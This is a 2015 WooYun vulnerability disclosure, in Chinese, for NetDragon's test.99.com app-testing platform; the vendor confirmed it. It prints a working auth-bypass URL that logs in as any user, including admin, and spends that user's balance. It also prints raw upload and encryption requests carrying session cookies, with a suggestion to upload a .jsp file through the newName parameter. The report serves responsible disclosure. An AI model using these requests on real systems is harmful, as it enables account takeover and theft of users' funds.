当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157092

漏洞标题:福建网龙某平台几个设计缺陷打包可随意登录任意用户帐号消费他人余额

相关厂商:福建网龙

漏洞作者: 路人甲

提交时间:2015-11-30 17:04

修复时间:2016-01-14 17:34

公开时间:2016-01-14 17:34

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-30: 细节已通知厂商并且等待厂商处理中
2015-11-30: 厂商已经确认,细节仅向厂商公开
2015-12-10: 细节向核心白帽子及相关领域专家公开
2015-12-20: 细节向普通白帽子公开
2015-12-30: 细节向实习白帽子公开
2016-01-14: 细节向公众公开

简要描述:

设计缺陷打包,可随意登录任意用户帐号消费他人余额

详细说明:

QQ截图20151130160810.png


地址:http://test.99.com/
正常用户访问关键页面都会跳转到登录页面
比如访问:http://test.99.com/reportHome?inner=1
但我发现,在用户登录的时候,程序向服务端发送了一个请求
http://test.99.com/registeruser/CookInsert?userAccount=你的用户名&inner=1
他的作用貌似是写入cookie
所以你只要任意输入一个userAccount(用户名,如果输入已存在的用户名),就可以看见这个用户的已操作内容,比如测试了什么app,测试结果如何,可以用这个用户的余额去测试你自己的app

http://test.99.com/registeruser/CookInsert?userAccount=admin&inner=1


输入该链接后会自动跳转

QQ截图20151130160810.png


注意右上角,admin登录

QQ截图20151130161507.png

漏洞证明:

试试我刚注册的一个帐号

QQ截图20151130161642.png


QQ截图20151130161806.png


QQ截图20151130162458.png


QQ截图20151130162523.png


我可以消费他人账户的余额了
另外提一下上传

POST http://test.99.com/Upload/Upload?newName=20151130161726641 HTTP/1.1
Accept: text/*
Content-Type: multipart/form-data; boundary=----------cH2cH2Ef1KM7ei4ei4Ij5gL6GI3ei4
User-Agent: Shockwave Flash
Host: test.99.com
Content-Length: 611
Connection: Keep-Alive
Pragma: no-cache
Cookie: 0FF535D2-3733-4059-AA48-73EFB0DA00CE=376FC8AE-EA0A-4aa9-8CF8-BDCF086DAFE7=2015-11-30 10:50:52&43CB770B-ECB7-4262-9F28-474C756FA85C=70d4a8d4-8f66-485b-8e94-ee1fce775487&77A7D26A-7211-4b2a-A04A-1A3F9959F179=3701509273&BF191744-3205-4d76-B8FC-3E0387F7EEFE=d55e909c26e5e8d5ebfa345be7b09fc8; NDUserCenterLogin=8D86E0CC-3E73-4d40-B849-55E6E63F9A08=910436806&689CFFF9-7996-407d-A0DC-C834CE0B56A3=7EF92FB482E4EB2EE160B6A5DEFD1F5029D046F09C329EF6C1BF5679A18308A58D32B5CB7B152CE7&6ACA984D-8C96-4f45-9DE4-EABE9161375B=5B09E419049BB818BB6E0E7C6E8F5959F93E97C6A61551DF0718F6AE3F737504&C201DE9A-536B-428d-88E4-4F8665742D12=1586&89FDB445-D8D5-4d19-BC3A-D1EC2BFE68E1=20151130105247&8E533C9E-481D-4288-89B2-71F96380C540=2015-11-30 11:52:47&6E3A37BE-A0BD-4b9b-87A3-3323C3806ADD=1597710df36c165ce69efc4517f897bd; QATestin=userid=test&userForm=99U; CNZZDATA1255966092=569517393-1448870087-%7C1448870087; Hm_lvt_d2a8914c513a31a167eb34a53b6b69f8=1448850128,1448851539,1448871451; Hm_lpvt_d2a8914c513a31a167eb34a53b6b69f8=1448871537
------------cH2cH2Ef1KM7ei4ei4Ij5gL6GI3ei4
Content-Disposition: form-data; name="Filename"
1.apk
------------cH2cH2Ef1KM7ei4ei4Ij5gL6GI3ei4
Content-Disposition: form-data; name="fileext"
*.apk
------------cH2cH2Ef1KM7ei4ei4Ij5gL6GI3ei4
Content-Disposition: form-data; name="folder"
/YunFTP
------------cH2cH2Ef1KM7ei4ei4Ij5gL6GI3ei4
Content-Disposition: form-data; name="Filedata"; filename="1.apk"
Content-Type: application/octet-stream
------------cH2cH2Ef1KM7ei4ei4Ij5gL6GI3ei4
Content-Disposition: form-data; name="Upload"
Submit Query
------------cH2cH2Ef1KM7ei4ei4Ij5gL6GI3ei4--


看newName这个参数,如果修改为带后缀的test.jsp会如何

QQ截图20151130162253.png


返回值1是上传成功,0是失败
但可惜我没找到上传路径或者站点根路径
再提一下加密
http://test.99.com/AdapterReport?taskid=RTUyMEZCRTg0RkVFQ0U1Qw%3d%3d
这是加密好的值,但你加密的过程能不能不这样

POST http://test.99.com/JiaMi/Encrypt HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://test.99.com/ReportHome/
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: test.99.com
Content-Length: 10
Connection: Keep-Alive
Pragma: no-cache
Cookie: 0FF535D2-3733-4059-AA48-73EFB0DA00CE=376FC8AE-EA0A-4aa9-8CF8-BDCF086DAFE7=2015-11-30 10:50:52&43CB770B-ECB7-4262-9F28-474C756FA85C=70d4a8d4-8f66-485b-8e94-ee1fce775487&77A7D26A-7211-4b2a-A04A-1A3F9959F179=3701509273&BF191744-3205-4d76-B8FC-3E0387F7EEFE=d55e909c26e5e8d5ebfa345be7b09fc8; NDUserCenterLogin=8D86E0CC-3E73-4d40-B849-55E6E63F9A08=910436806&689CFFF9-7996-407d-A0DC-C834CE0B56A3=7EF92FB482E4EB2EE160B6A5DEFD1F5029D046F09C329EF6C1BF5679A18308A58D32B5CB7B152CE7&6ACA984D-8C96-4f45-9DE4-EABE9161375B=5B09E419049BB818BB6E0E7C6E8F5959F93E97C6A61551DF0718F6AE3F737504&C201DE9A-536B-428d-88E4-4F8665742D12=1586&89FDB445-D8D5-4d19-BC3A-D1EC2BFE68E1=20151130105247&8E533C9E-481D-4288-89B2-71F96380C540=2015-11-30 11:52:47&6E3A37BE-A0BD-4b9b-87A3-3323C3806ADD=1597710df36c165ce69efc4517f897bd; QATestin=userid=人为马赛克&userForm=99U; CNZZDATA1255966092=2105390528-1448850179-http%253A%252F%252Ftest.99.com%252F%7C1448850179; Hm_lvt_d2a8914c513a31a167eb34a53b6b69f8=1448850128,1448851539; Hm_lpvt_d2a8914c513a31a167eb34a53b6b69f8=1448853165
input=5187


这样直接传值进行加密,完全没有必要啊

修复方案:

补丁

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-11-30 17:34

厂商回复:

感谢支持

最新状态:

暂无